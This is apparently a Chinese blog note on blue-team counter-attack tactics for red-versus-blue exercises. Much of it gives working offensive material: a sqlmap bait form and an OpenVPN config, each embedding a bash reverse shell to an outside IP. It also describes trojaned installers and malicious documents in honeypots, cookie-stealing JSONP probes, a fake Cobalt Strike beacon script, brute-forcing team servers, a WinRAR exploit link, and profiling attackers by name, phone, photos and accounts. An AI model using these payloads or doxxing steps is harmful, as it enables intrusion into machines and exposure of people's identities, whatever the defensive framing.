紅藍對抗-反制

一.前言

初次接觸反制技術，寫一個文檔作為記錄。

二.反制中常見技術點

1.蜜罐

蜜罐可以理解成互聯網上的一臺主機，它的作用是誘騙攻擊者去對自己進行攻擊，然后記錄攻擊者的攻擊細節并生成對應的攻擊者畫像，是當前的一種比較主流的入侵檢測系統也是一種主動防御系統。

1.1 放置高交互蜜罐

放置高交互蜜罐，例如一個郵箱服務類型的蜜罐，攻擊者有可能會進行郵箱注冊，這樣子攻擊者就主動向我們留下了自己的身份信息。

1.2 放置多個容易被發現的蜜罐

放置多個攻擊者可以輕而易舉發現的蜜罐，攻擊者就會知道自己所在的環境是被蜜罐所包圍的，有可能就會放棄進行大范圍攻擊，變相保護了蜜罐背后的真實核心系統。

1.3 在蜜罐中使用JSONP探針

蜜罐中設置一個網頁，網頁中寫入指定的代碼。當攻擊者訪問指定網頁的時候，就會竊取攻擊者的cookie并上傳到服務器上，被竊取的cookie是可以被指定的，例如可以竊取攻擊者登陸百度的cookie，登陸豆瓣的cookie等，可以通過此來得到攻擊者畫像，獲取黑客的ip地址，分別通過webrtc與淘寶接口。但是在最新版的瀏覽器中，webrtc因為隱私問題，已經被瀏覽器禁止通過該接口獲取用戶ip。淘寶接口從瀏覽器端調用該接口的話，獲取的ip準確度較高。

條件：

1.攻擊者登陸過社交媒體并且未退出賬號

2.擁有相關媒體的jsonp接口

參考文章：

利用社交賬號精準溯源的蜜罐技術

利用webrtc獲取真實ip

JSONP探針

1.4 蜜罐掛馬

留幾個文件下載鏈接，例如vpn客戶端，并對正常程序進行木馬植入。或者制作惡意的excel文檔誘導其進行下載。

蜜罐中放置惡意安裝包,參考文章DLL劫持+重新制作安裝包在釣魚與反釣魚的利用

2.信息干擾

紅隊攻擊前都會進行信息收集，一般都是通過天眼查，github，gitlab等，我們可以在github上放置惡意exp或者無效等源代碼，可以拖延紅隊的攻擊實現，甚至實現反制(如果紅隊運行了我們的惡意exp的話)，然后通過網絡故意透露我們的蜜罐信息，誘導紅隊去攻擊蜜罐，進而得到黑客畫像。

3.反擊思路

3.1 反制釣魚頁面

直接對釣魚頁面進行web滲透攻擊，嘗試直接控制。攻防演戲開始前期，紅隊成員肯定會用許多肉雞去對目標資產進行批量漏洞掃描，或者自己使用肉雞生成釣魚頁面等，這些肉雞基本都含有漏洞，這時候去反擊成功率會比較高。

3.2 反制釣魚郵件

1.對附件進行逆向分析，得到C2地址，然后對目標ip進行滲透攻擊。

通過郵箱求手機號碼可見：已知郵箱，求手機號碼?

有一個網站可以查詢利用目標郵箱注冊過的網站：查找郵箱注冊過的網站

2.發現釣魚郵件后，將釣魚郵件放在我們提前配置好的蜜罐中執行，在蜜罐中放上惡意的加入木馬的vpn安裝包與密碼本，等待攻擊者下載并連接。

補充：放置郵件探針

思路：放置一個郵件，提前告訴大家不要點，然后攻防演戲期間有人點了的話十有八九就是因為賬號被控了。

3.3 反制攻擊工具

倘若對方使用帶有漏洞版本的攻擊工具例如蟻劍、AWVS等，這時候可以使用RCE攻擊對其進行反控，高版本蟻劍上此漏洞已經被修復。

已知有漏洞的工具版本：

1.蟻劍 <=2.0.7

暫無直接可用exp。

2.awvs 10

直接利用exp，等待對方掃描自己，即刻上線。exp下載地址：https://github.com/dzonerzy/acunetix_0day

也可以利用CSRF漏洞去反擊。

參考文章：

論如何反擊用AWVS的黑客

如何優雅的反擊掃描你網站的黑客

3.cs 3.5

只有3.5及以下版本可能被利用，且無直接可用exp，參考文章Cobalt Strike team服務被爆RCE漏洞，盡快升級最新版!

4.sqlmap

構造特殊的get或者post注入點來等待攻擊者使用sqlmap掃描，例如下圖，將get請求中的一個參數的值設置為`ls`l,倘若直接改成反彈shell的代碼即可反控對方機器。

post方式的利用：

頁面代碼:

<html>
<head>
<title> A sqlmap honeypot demo</title>
</head>
<body>
<input>search the user</input>
<form id="myForm" action="username.html" method="post" enctype="text/plain">
<input type='hidden' name='name'value='Robin&id=4567&command=shell`bash -i >&/dev/tcp/192.168.xxx.xxx/2333 0>&1`&port=1234'/>
<input type="button"οnclick="myForm.submit()" value="Submit">
</form>
</body>
</html>

burp截圖：

如果紅隊成員不仔細看post數據，就有可能直接復制黏貼post請求放在sqlmap里面跑，這樣子就會被藍隊控制，但如果直接復制包的所有數據用sqlmap -r命令的話是不會被控制的。

參考文章：注意了，使用sqlmap的你可能踩中了蜜罐

5. msf v=Metasploit 4.12.0-2016061501 to 4.12.0-2016083001

msf中直接有利用腳本，路徑為exploit/multi/http/metasploit_static_secret_key_base。

可以在shodan上直接搜索互聯網側的msf：title:"metasploit is initializing"

參考文章:Metasploit 反序列化漏洞

淺談蟻劍RCE

嵌入式瀏覽器安全雜談-electron框架

中國蟻劍源碼分析

論如何反擊用AWVS的黑客

使用各種掃描工具的你，不但踩了“蜜罐”可能還要被團滅了

3.4 反制XSS盲打

我們遇見了XSS盲打攻擊時，可以選擇將虛假信息回傳給XSS平臺并反制攻擊者。具體實現：

1.在蜜罐上配置一個后臺管理系統的一個頁面，讓這個頁面存在XSS漏洞。

2.頁面的背后邏輯是，如果賬號密碼驗證成功則顯示當前IP不在準入名單中，然后彈到另一個頁面，另一個頁面是下載頁面，這個頁面上部署一個植入木馬的程序(例如軟件安裝包)，誘導攻擊者下載。

參考文章：看藍隊如何干翻你，淺談藍隊反制手段！

3.5 利用winrar漏洞

條件：安裝winrar軟件

實現的效果：攻擊者下載我們制作好的惡意rar文件，在自己電腦上利用winrar解壓后，就會將我們事先指定的exe文件解壓到當前用戶的開機啟動文件夾下，等機器重啟的時候就會運行我們事先安排的exe文件。

利用：https://github.com/WyAtu/CVE-2018-20250

3.6 利用openvpn客戶端配置文件后門進行反制

我們可以在服務器上留下一個openvpn客戶端的后門文件，里面的部分內容如下：

remote 192.168.31.137
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.31.138/9090 0<&1 2>&1&'"

我們可以先做一個蜜罐，比如說蜜罐就是192.168.31.137，且這個ip可以被攻擊者反問到。在蜜罐上面只配置openvpn服務，然后將上面的openvpn客戶端文件放在另一臺主機上，最好是臺windows主機且無法執行openvpn命令，這樣子攻擊者就不得不下載這個配置文件進行利用。

當攻擊者下載openvpn配置文件到本地進行sudo openvpn example.ovpn后，就會執行我們事先寫入的反彈shell的命令，進而達到反控的效果。

參考文章：

從OpenVPN配置文件中創建反彈Shell實現用戶系統控制

對某攻擊隊的Webshell進行分析

3.7 反制coablt strike

1.反制釣魚

在隔離網段機器上批量啟動釣魚文件，DDOS紅隊的Teamserver，利用腳本。

參考文章：藍色吃定紅色-爆破CS Teamserver 密碼

2.爆破CS密碼

一般情況下CS都會設置在50050端口，且密碼相對都會比較簡單，我們可以使用腳本去破解其密碼直接連接其服務端然后進行其他操作。爆破腳本：腳本下載地址

3.假上線

只發送心跳包，讓CS以為我們已經上線，這時候攻擊者只會看到上線信息但無法執行任何命令。

利用代碼：

import re
import time
import requests

def heartbeat():
    url = "http://192.168.186.133:333/activity"
    headers = {
'Cookie': 'IgyzGuIX0Jra5Ht45ZLYKyXWBnxfkNI3m6BOvExEPdWCuAv8fnY6HXKTygBOVdE34sDYusoDIjzHr/QR32mKsoVPb5NFMCHAtC7FLQUdSsZdufXjsd2dSqkGDcaZkcQYD1BssyjGZHTy42lT8oDpga3y1z5FMGRjobeksgaMX7M=',
'Host': '192.168.186.133:333',
'Accept': '*/*',
'Connection': 'Keep-Alive',
'Cache-Control': 'no-cache',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)'
        }
    resp = requests.get(url=url,headers=headers)
    text = resp.content.hex()
return text

x = True
while x:
    text = heartbeat()
    lengs = len(text)
# print(lengs, "    ", text)

if '2f4320' in text and '000041' in text:
        print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))

        commeds = re.findall(r'2f4320(.*?)000041', text)
for comm in commeds:
            commed = bytes.fromhex(comm).decode('utf-8')
            print(commed)
    time.sleep(5)

腳本下載地址：fake_online

參考文章：看我如何模擬Cobalt Strike上線欺騙入侵者

3.8反制dnslog與httplog

1.對常見的dnslog平臺進行屏蔽。

2.在站長之家上利用多地ping檢測來對目標對dnslog域名進行攻擊，達到混淆視聽的效果,例如對方的dnslog域名為zzz.test.com，我們就可以去ping administrator.zzz.test.com即可，達到混淆視聽的目的。

三.溯源

1. 溯源目標模版：

姓名/ID：

攻擊IP：

地理位置：

QQ:

IP地址所屬公司：

IP地址關聯域名：

郵箱：

手機號：

微信/微博/src/id證明：

人物照片：

跳板機（可選）：

關聯攻擊事件：

2. 溯源思路

登陸受害機器進行信息收集

如果是linux可以查看命令執行歷史與其他相關日志文件。

如果是windows可以查詢ID == 4625審核失敗的日志，后續通過對時間的排查、以及源IP地址、類型與請求的頻率進行分析來判斷是否是來源于內網的暴力破解，通過對logontype的數值確認就可以確認到底是通過什么協議進行暴力破解成功的。相對的數值關系：

local WINDOWS_RDP_INTERACTIVE = “2”

local WINDOWS_RDP_UNLOCK = “7”

local WINDOWS_RDP_REMOTEINTERACTIVE = “10”

local WINDOWS_SMB_NETWORK = “3”

1.針對IP或者域名通過公網已有的開放信息進行查詢

https://x.threatbook.cn/

https://ti.qianxin.com/

https://ti.#/

https://www.venuseye.com.cn/

https://community.riskiq.com/

3.定位目標

利用精確ip定位進行目標的位置定位。

4.收集互聯網側的用戶ID

收集手機號與互聯網上的各種ID信息(利用google hacking)。

5.進入跳板機進行信息收集

如果有能力控制了紅隊的跳板機，則可進入跳板機進行信息收集，查看命令執行的歷史記錄與日志等。

四、參考文章

從OpenVPN配置文件中創建反彈Shell實現用戶系統控制

- https://www.freebuf.com/articles/terminal/175862.html

對某攻擊隊的Webshell進行分析

- https://gh0st.cn/archives/2019-08-21/1

利用winrar漏洞

- https://github.com/WyAtu/CVE-2018-20250

看藍隊如何干翻你，淺談藍隊反制手段！

- https://my.oschina.net/u/4579491/blog/4499994

淺談蟻劍RCE

- https://xz.aliyun.com/t/8167

嵌入式瀏覽器安全雜談-electron框架

- http://www.f4ckweb.top/index.php/archives/103/

中國蟻劍源碼分析

- https://yzddmr6.tk/posts/antsword-diy-4/

論如何反擊用AWVS的黑客

- https://www.freebuf.com/news/136476.html

DLL劫持+重新制作安裝包在釣魚與反釣魚的利用

- https://mp.weixin.qq.com/s?__biz=MzU2NTc2MjAyNg==&mid=2247484016&idx=1&sn=c4cd2db916f27a91fd179dbad78dd675&scene=21#wechat_redirect

已知郵箱，求手機號碼?

- https://mp.weixin.qq.com/s?__biz=MzI3NTExMDc0OQ==&mid=2247483802&idx=1&sn=e4317bcbc3e78ddf4c2715298ef197f2&scene=21#wechat_redirect

JSON探針

- https://lcx.cc/post/4444/

藍隊實戰溯源反制手冊分享

- https://sec.nmask.cn/article_content?a_id=81963be55e7e0658827dca12219ddc75

攻防演練中防守方的騷姿勢

- https://www.anquanke.com/post/id/219059

看我如何模擬Cobalt Strike上線欺騙入侵者

- https://k8gege.org/p/40523.html

藍色吃定紅色-爆破CS Teamserver 密碼

- https://mp.weixin.qq.com/s/AZwKkEeTErPeOrkVH2Mirw

利用webrtc獲取真實ip

- https://blog.csdn.net/leafrenchleaf/article/details/84743313

JSONP探針

- https://lcx.cc/post/4444/